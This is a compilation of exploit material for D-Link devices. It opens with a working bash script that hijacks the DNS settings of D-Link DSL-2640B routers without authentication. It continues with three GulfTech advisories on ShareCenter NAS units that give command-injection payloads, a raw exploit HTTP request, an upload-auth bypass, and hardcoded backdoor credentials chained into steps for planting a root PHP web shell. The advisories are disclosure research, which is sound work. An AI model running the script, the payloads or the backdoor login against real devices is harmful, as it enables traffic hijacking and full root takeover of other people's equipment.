# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit"
echo " ================================================================"
echo " Usage: $0 <Target> <Preferred DNS> <Alternate DNS>"
echo " Example: $0 192.168.1.1 8.8.8.8"
echo " Example: $0 192.168.1.1 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
echo " http://www.ethical-hacker.org/"
echo " https://www.facebook.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET "http://$1/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" 0&> /dev/null <&1
D-Link DNS-343 ShareCenter Remote Root
Vendor: D-Link
Product: D-Link DNS-343 ShareCenter
Version: <= 1.05
Website: http://sharecenter.dlink.com/products/DNS-343
###########################################################################
______ ____________ __
/ ____/_ __/ / __/_ __/__ _____/ /_
/ / __/ / / / / /_ / / / _ \/ ___/ __ \
/ /_/ / /_/ / / __/ / / / __/ /__/ / / /
\____/\__,_/_/_/ /_/ \___/\___/_/ /_/
GulfTech Research and Development
###########################################################################
# D-Link DNS-343 ShareCenter <= 1.05 Command Injection #
###########################################################################
Released Date: 2017-01-15
Last Modified: 2017-06-22
Company Info: D-Link
Version Info:
Vulnerable
D-Link DNS-343 ShareCenter <= 1.05
--[ Table of contents
00 - Introduction
00.1 Background
01 - Command Injection
01.1 - Vulnerable code analysis
01.2 - Remote exploitation
02 - Credit
03 - Proof of concept
04 - Solution
05 - Contact information
--[ 00 - Introduction
The purpose of this article is to detail the research that I have recently
completed regarding the D-Link DNS 343 ShareCenter.
--[ 00.1 - Background
The D-Link ShareCenter 4-Bay Network Storage Enclosure (DNS-343) connects
to your network instead of to a computer so everyone on your network can
back up content to one central location. Plus, it lets you share your
stored content across your network and over the Internet so family members,
friends and employees can access it no matter where they are.
--[ 01 - Command Injection
Within the DNS-343 web directory is a folder named "maintenance" that
contains a number of ASP scripts that are related to maintenance tasks that
can be performed. The script by the name of "test_mail.asp" caught my
attention, and that is what we will focus on for now.
--[ 01.1 - Vulnerable code analysis
The DNS-343 utilizes the goAhead web server, which contains a functionality
called goForms, which basically stores CGI in memory. This is important to
know as the previously mentioned "test_mail.asp" posts directly to the
"/goform/Mail_Test" endpoint. Code for this particular goForm can be found
within the "webs" binary.
int __fastcall sub_27D24(int a1)
{
int v1; // r4@1
int *v2; // r10@1
char *v3; // r8@1
char *v4; // r6@1
char *v5; // r5@1
char *v6; // r7@1
int v7; // r12@1
char *v8; // r0@4
char *v10; // [sp+10h] [bp-230h]@1
char *v11; // [sp+14h] [bp-22Ch]@1
char s; // [sp+18h] [bp-228h]@4
v1 = a1;
v2 = &dword_8D968;
v3 = sub_4D340(a1, (int)"f_auth", &byte_7F4B4);
v11 = sub_4D340(v1, (int)"f_username", &byte_7F4B4);
v10 = sub_4D340(v1, (int)"f_password", &byte_7F4B4);
v4 = sub_4D340(v1, (int)"f_smtpserver", &byte_7F4B4);
v5 = sub_4D340(v1, (int)"f_sender", &byte_7F4B4);
v6 = sub_4D340(v1, (int)"f_sendto", &byte_7F4B4);
system("rm /tmp/email_*");
v7 = (unsigned __int8)*v3 - 49;
if ( *v3 == 49 )
v7 = (unsigned __int8)v3[1];
if ( v7 )
{
sprintf(&s, "email -h %s -p 25 -a 0 -s %s -d %s -t", v4, v5, v6);
v2 = &dword_8D968;
v8 = &s;
}
else
{
sprintf(&s, "email -h %s -p 25 -a 1 -u %s -w %s -s %s -d %s -t", v4,
v11, v10, v5, v6);
v8 = &s;
}
*v2 = system(v8);
*v2 = sub_27C80();
return THISISAREDIRECT(v1, "web/maintenance/test_mail_result.asp");
}
As can be seen in the above psuedo code, the form data passed to the goForm
endpoint is never sanitized, and then used directly in a system call. This
can be leveraged by an unauthenticated remote attacker to execute code as
root and take complete control of the device.
--[ 01.2 - Remote exploitation
Exploiting this issue is trivial, and can be achieved by simply sending a
post request containing a command injection string within one of the fields
that are affected to the "/goform/Mail_Test" endpoint. I achieved this by
sending a post request with the following data.
f_smtpserver=;touch /tmp/gulftech;
The above post request successfully creates the file named "gulftech"
within the /tmp directory as the root user.
--[ 02 - Credit
James Bercegay
GulfTech Research and Development
--[ 03 - Proof of concept
We strive to do our part to contribute to the security community.
Metasploit modules for issues outlined in this paper can be found online.
--[ 04 - Solution
D-Link were notified of these issues June of last year. No update has been
released publicly.
--[ 05 - Contact information
Web
https://gulftech.org/
Mail
security@gulftech.org
Copyright 2018 GulfTech Research and Development. All rights reserved.
D-Link DNS-325 ShareCenter Multiple Vulnerabilities
Vendor: D-Link
Product: D-Link DNS-325 ShareCenter
Version: <= 1.05B03
Website: http://sharecenter.dlink.com/products/DNS-325
###########################################################################
______ ____________ __
/ ____/_ __/ / __/_ __/__ _____/ /_
/ / __/ / / / / /_ / / / _ \/ ___/ __ \
/ /_/ / /_/ / / __/ / / / __/ /__/ / / /
\____/\__,_/_/_/ /_/ \___/\___/_/ /_/
GulfTech Research and Development
###########################################################################
# D-Link DNS-325 ShareCenter <= 1.05B03 Multiple Vulnerabilities #
###########################################################################
Released Date: 2017-01-15
Last Modified: 2017-06-22
Company Info: D-Link
Version Info:
Vulnerable
D-Link DNS-325 ShareCenter <= 1.05B03
--[ Table of contents
00 - Introduction
00.1 Background
01 - Unrestricted File Upload
01.1 - Vulnerable code analysis
01.2 - Remote exploitation
02 - Command Injection
02.1 - Vulnerable code analysis
02.2 - Remote exploitation
03 - Credit
04 - Proof of concept
05 - Solution
06 - Contact information
--[ 00 - Introduction
The purpose of this article is to detail the research that I have recently
completed regarding the D-Link DNS 325 ShareCenter.
--[ 00.1 - Background
D-Link Share Center DNS-325 2-Bay Network Storage Enclosure is an easy to
use solution for accessing, sharing and backing up your important data.
--[ 01 - Unrestricted file upload
The DNS-325 is vulnerable to the same file upload issue as the DNS-320L.
The vulnerable code can be found within the following file:
/usr/local/modules/web/pages/jquery/uploader/multi_uploadify.php
The root of the problem here is due to the misuse and misunderstanding of
the PHP gethostbyaddr() function used within PHP, by the developer of this
particular piece of code. From the PHP manual this functions return values
are defined as the following for gethostbyaddr():
"Returns the host name on success, the unmodified ip_address on failure, or
FALSE on malformed input."
With a brief overview of the problem, let's have a look
at the offending code in order to get a better understanding of what is
going on with this particular vulnerability.
--[ 01.1 - Vulnerable code analysis
Below is the code from the vulnerable "multi_uploadify.php" script. You can
see that we have annoted the code to explain what is happening.
#BUG 01: Here the attacker controlled "Host" header is used to define the
remote auth server. This is by itself really bad, as an attacker could
easily just specify that the host be the IP address of a server that they
are in control of. But, if we send it an invalid "Host" header it will just
simply return FALSE as defined in the PHP manual.
$ip = gethostbyaddr($_SERVER['HTTP_HOST']);
$name = $_REQUEST['name'];
$pwd = $_REQUEST['pwd'];
$redirect_uri = $_REQUEST['redirect_uri'];
//echo $name ."
".$pwd."
".$ip;
#BUG 02: At this point, this request should always fail. The $result
variable should now be set to FALSE.
$result = @stripslashes( @join( @file( "http://".$ip."/mydlink/mydlink.cgi?
cmd=1&name=".$name."=&pwd=".$pwd ),"" ));
#BUG 03: Here an empty haystack is searched, and thus strstr() returns a
value of FALSE.
$result_1 = strstr($result,"0");
$result_1 = substr ($result_1, 0,28);
#BUG 04: The strncmp() call here is a strange one. It looks for a specific
login failure. So, it never accounts for when things go wrong or slightly
unexpected. As a result this "if" statement will always be skipped.
if (strncmp ($result_1,"0",28) == 0 )
//if (strstr($result,"0")== 0 )
{
header("HTTP/1.1 302 Found");
header("Location: ".$redirect_uri."?status=0");
exit();
}
#BUG 05: At this point all checks have been passed, and an attacker can use
this issue to upload any file to the server that they want.
The rest of the source code was omitted for the sake of breivity, but it
just handles the file upload logic once the user passes the authentication
checks.
--[ 01.2 - Remote exploitation
Exploiting this issue to gain a remote shell as root is a rather trivial
process. All an attacker has to do is send a post request that contains a
file to upload using the parameter "Filedata[0]", a location for the file
to be upload to which is specified within the "folder" parameter, and of
course a bogus "Host" header.
We have written a Metasploit module to exploit this issue. The module will
use this vulnerability to upload a PHP webshell to the "/var/www/"
directory. Once uploaded, the webshell can be executed by requesting a URI
pointing to the backdoor, and thus triggering the payload.
--[ 02 - Command Injection
There are a number of issues with the CGI's contained within the DNS-325
file structure. The issues that we came across over and over were lack of
authentication, as well as command injection. We will examine one of these
issues, and leave the others as an excercise to the reader.
--[ 02.1 - Vulnerable code analysis
The CGI binary named "photocenter_mgr.cgi" is vulnerable to a very straight
forward command injection issue when calling the "cgi_set_airplay_device"
function.
size_t cgi_set_airplay_device()
{
int v0; // r4@3
size_t v1; // r0@3
const char *v2; // r0@3
FILE *v3; // r5@5
char *v4; // r0@6
int v5; // r4@7
signed int v6; // r6@7
size_t result; // r0@13
FILE *v8; // r4@11
int v9; // [sp+10h] [bp-C84h]@1
int v10; // [sp+410h] [bp-884h]@1
int v11; // [sp+610h] [bp-684h]@1
int v12; // [sp+810h] [bp-484h]@1
char s; // [sp+A10h] [bp-284h]@1
char v14; // [sp+B10h] [bp-184h]@1
char v15; // [sp+B50h] [bp-144h]@1
char v16; // [sp+B90h] [bp-104h]@1
signed int v17; // [sp+B94h] [bp-100h]@2
signed int v18; // [sp+B98h] [bp-FCh]@2
signed int v19; // [sp+B9Ch] [bp-F8h]@2
int v20; // [sp+BA0h] [bp-F4h]@2
__int16 v21; // [sp+BA4h] [bp-F0h]@15
char v22; // [sp+BA6h] [bp-EEh]@15
char v23; // [sp+BD0h] [bp-C4h]@1
char v24; // [sp+C10h] [bp-84h]@1
int v25; // [sp+C50h] [bp-44h]@1
int v26; // [sp+C54h] [bp-40h]@1
char dest[4]; // [sp+C58h] [bp-3Ch]@1
int v28; // [sp+C5Ch] [bp-38h]@1
int v29; // [sp+C60h] [bp-34h]@1
int *v30; // [sp+C64h] [bp-30h]@1
memset(&s, 0, 0x100u);
memset(&v12, 0, 0x200u);
memset(&v24, 0, 0x40u);
memset(&v23, 0, 0x40u);
memset(&v11, 0, 0x200u);
v30 = 0;
memset(&v9, 0, 0x400u);
*(_DWORD *)dest = 0;
v28 = 0;
memset(&v10, 0, 0x200u);
v25 = 0;
v26 = 0;
memset(&v16, 0, 0x40u);
memset(&v15, 0, 0x40u);
memset(&v14, 0, 0x40u);
cgiFormString("dev_name", &s, 256);
cgiFormString("dev_type", &v24, 64);
cgiFormString("dev_pw", &v23, 64);
cgiFormString("type", &v25, 8);
v30 = &v12;
v29 = 512;
printf_out("dev_name=[%s]\n", &s);
printf_out("dev_type=[%s]\n", &v24);
printf_out("dev_pw=[%s]\n", &v23);
printf_out("type=[%s]\n", &v25);
if ( !strcmp((const char *)&v25, "photo") )
{
LOBYTE(v20) = 0;
*(_DWORD *)&v16 = 1886221359;
v17 = 1919508783;
v18 = 2036427888;
v19 = 1819113518;
}
else
{
*(_DWORD *)&v16 = 1886221359;
v17 = 'ria/';
v18 = 2036427888;
v19 = 1685414239;
v20 = 2016309097;
v22 = 0;
v21 = 'lm';
}
v0 = 0;
sprintf((char *)&v11, "rm -f %s", &v16);
system((const char *)&v11);
v1 = strlen(&s);
v2 = (const char *)escape_label(&s, v1, &v30, &v29);
cgi_api_SpecSymbol2BackSlash((char *)&v9, v2);
sprintf((char *)&v11, "airplayer -c connect -d \"%s\" -t \"%s\" %s >/dev/
null", &v9, &v24, &v23);
printf_out("[%s]\n", &v11);
system((const char *)&v11);
printf_out("filename[%s]\n", &v16);
while ( 1 )
{
++v0;
v3 = (FILE *)fopen64(&v16, "r");
if ( v3 )
break;
printf_out("wait[%d]\n");
sleep(1u);
if ( v0 == 30 )
{
v6 = (signed int)v3;
goto LABEL_9;
}
}
fgets(&v15, 512, v3);
fgets(&v15, 512, v3);
fgets(&v15, 512, v3);
fgets(&v14, 512, v3);
v4 = index(&v14, 62);
if ( v4 )
{
v5 = (int)(v4 + 1);
v6 = 1;
*index(v4 + 1, 60) = 0;
strcpy(dest, v4 + 1);
printf_out("res[%s]\n", v5);
}
else
{
v6 = 0;
}
fclose(v3);
LABEL_9:
sprintf(&v16, "/var/www/xml/airplay_info_%s.xml", &v25);
if ( dest[0] == 48 && !dest[1] )
{
v8 = (FILE *)fopen64(&v16, "w+");
fwrite("", 1u, 0x26u, v8);
sprintf(
(char *)&v10,
"%s",
&s,
&v24,
&v23);
fputs((const char *)&v10, v8);
fclose(v8);
}
cgiHeaderContentType("text/xml");
fwrite("", 1u, 0x26u, (FILE *)
cgiOut);
if ( v6 == 1 )
{
result = fprintf((FILE *)cgiOut, "%s",
dest);
}
else
{
system("kill `pidof airplay_daemon`");
result = fwrite("timeout", 1u, 0x25u,
(FILE *)cgiOut);
}
return result;
}
As we can see in the above psuedo code parameters taken from form input are
use directly within a system call without being sanitized. This can be
leveraged by an attacker to execute arbitrary commands as root.
Authentication is not required to exploit this issue.
--[ 02.2 - Remote exploitation
Exploiting this issue is trivial. Authentication is not required to
successfully exploit this issue and gain a remote root shell.
POST /cgi-bin/photocenter_mgr.cgi HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
cmd=cgi_set_airplay_device&dev_type=1";touch /tmp/gulftech;"
Simply sending a post request like the one above will successfully create a
file named "gulftech" in the /tmp directory as root.
--[ 03 - Credit
James Bercegay
GulfTech Research and Development
--[ 04 - Proof of concept
We strive to do our part to contribute to the security community.
Metasploit modules for issues outlined in this paper can be found online.
--[ 05 - Solution
D-Link were notified of these issues June of last year. No update has been
released publicly.
--[ 06 - Contact information
Web
https://gulftech.org/
Mail
security@gulftech.org
Copyright 2018 GulfTech Research and Development. All rights reserved.
DNS-320L ShareCenter Backdoor
Vendor: D-Link
Product: DNS-320L ShareCenter
Version: < 1.06
Website: http://www.dlink.com/uk/en/products/dns-320l-sharecenter-2-bay-cloud-storage-enclosure
###########################################################################
______ ____________ __
/ ____/_ __/ / __/_ __/__ _____/ /_
/ / __/ / / / / /_ / / / _ \/ ___/ __ \
/ /_/ / /_/ / / __/ / / / __/ /__/ / / /
\____/\__,_/_/_/ /_/ \___/\___/_/ /_/
GulfTech Research and Development
###########################################################################
# D-Link DNS-320L ShareCenter Backdoor #
###########################################################################
Released Date: 2018-01-03
Last Modified: 2017-06-14
Company Info: D-Link
Version Info:
Vulnerable
D-Link DNS-320L ShareCenter < 1.06
Possibly various other ShareCenter devices
Not Vulnerable
D-Link DNS-320L ShareCenter >= 1.06
--[ Table of contents
00 - Introduction
00.1 Background
01 - Hard coded backdoor
01.1 - Vulnerable code analysis
01.2 - Remote exploitation
02 - Credit
03 - Proof of concept
04 - Solution
05 - Contact information
--[ 00 - Introduction
The purpose of this article is to detail the research that GulfTech has
recently completed regarding the D-Link DNS 320L ShareCenter.
--[ 00.1 - Background
D-Link Share Center 2-Bay Cloud Storage 2000 (DNS-320L) aims to be a
solution to share, stream, manage and back up all of your digital files by
creating your own personal Cloud.
--[ 01 - Hard coded backdoor
While doing some research on another device, I came across a hard coded
backdoor within one of the CGI binaries. Several different factors such as
similar file structure and naming schemas led me to believe that the code
that was in the other device was also shared with the DNS-320L ShareCenter.
As it turned out our hunch was correct. An advisory regarding the other
vulnerable device in question will be released in the future, as the vendor
for that device is still in the process of addressing the issues.
Now, let's take a moment to focus on the following file which is a standard
Linux ELF executable and pretty easy to go through.
/usr/local/modules/cgi/nas_sharing.cgi
The above file can be accessed by visiting "/cgi-bin/nas_sharing.cgi" and
contains the following function that is used to authenticate the user.
--[ 01.1 - Vulnerable code analysis
Below is the psuedocode created from the disassembly of the binary. I have
renamed the function to "re_BACKDOOR" to visually identify it more easily.
struct passwd *__fastcall re_BACKDOOR(const char *a1, const char *a2)
{
const char *v2; // r5@1
const char *v3; // r4@1
struct passwd *result; // r0@4
FILE *v5; // r6@5
struct passwd *v6; // r5@7
const char *v7; // r0@9
size_t v8; // r0@10
int v9; // [sp+0h] [bp-1090h]@1
char s; // [sp+1000h] [bp-90h]@1
char dest; // [sp+1040h] [bp-50h]@1
v2 = a2;
v3 = a1;
memset(&s, 0, 0x40u);
memset(&dest, 0, 0x40u);
memset(&v9, 0, 0x1000u);
if ( *v2 )
{
v8 = strlen(v2);
_b64_pton(v2, (u_char *)&v9, v8);
if ( dword_2C2E4 )
{
sub_1194C((const char *)&unk_1B1A4, v2);
sub_1194C("pwd decode[%s]\n", &v9);
}
}
if (!strcmp(v3, "mydlinkBRionyg")
&& !strcmp((const char *)&v9, "abc12345cba") )
{
result = (struct passwd *)1;
}
else
{
v5 = (FILE *)fopen64("/etc/shadow", "r");
while ( 1 )
{
result = fgetpwent(v5);
v6 = result;
if ( !result )
break;
if ( !strcmp(result->pw_name, v3) )
{
strcpy(&s, v6->pw_passwd);
fclose(v5);
strcpy(&dest, (const char *)&v9);
v7 = (const char *)sub_1603C(&dest, &s);
return (struct passwd *)(strcmp(v7, &s) == 0);
}
}
}
return result;
}
As you can see in the above code, the login functionality specifically
looks for an admin user named "mydlinkBRionyg" and will accept the password
of "abc12345cba" if found. This is a classic backdoor. Simply login with
the credentials that were just mentioned from the above code.
--[ 01.2 - Remote exploitation
Exploiting this backdoor is fairly trivial, but I wanted a root shell, not
just admin access with the possibility of shell access. So, I started
looking at the functionality of this file and noticed the method referenced
when the "cmd" parameter was set to "15". This particular method happened
to contain a command injection issue. Now I could turn this hard coded
backdoor into a root shell, and gain control of the affected device.
However, our command injection does not play well with spaces, or special
characters such as "$IFS", so I got around this by just playing ping pong
with pipes, and syslog() in order to create a PHP shell. These are the
steps that I took to achieve this.
STEP01: We send a logout request to /cgi-bin/login_mgr.cgi?cmd=logout with
the "name" parameter value set to that of our malicious PHP wrapper code
within our POST data. This "name" parameter is never sanitized.
name=
At this point we have successfully injected our payload into the user logs,
as the name of the user who logouts is written straight to the user logs. A
user does not have to be logged in, in order to logout and inject data.
STEP02: We now use cat to readin the user log file and pipe it out to the
web directory in order to create our PHP web shell.
GET /cgi-bin/nas_sharing.cgi?dbg=1&cmd=15&user=mydlinkBRionyg&passwd=YWJjMT
IzNDVjYmE&system=cat/var/www/shell.php HTTP/1.1
At this point an attacker can now simply visit the newly created web shell
and execute any PHP code that they choose, as root.
http://sharecenterhostname/shell.php?01100111=phpinfo();
By sending a request like the one above a remote attacker would cause the
phpinfo() function to be displayed, thus demonstrating successful remote
exploitation as root.
--[ 02 - Credit
James Bercegay
GulfTech Research and Development
--[ 03 - Proof of concept
We strive to do our part to contribute to the security community.
Metasploit modules for issues outlined in this paper can be found online.
--[ 04 - Solution
Upgrade to firmware version 1.06 or later. See the official vendor website
for further details.
--[ 05 - Contact information
Web
https://gulftech.org
Mail
security@gulftech.org
Copyright 2018 GulfTech Research and Development. All rights reserved.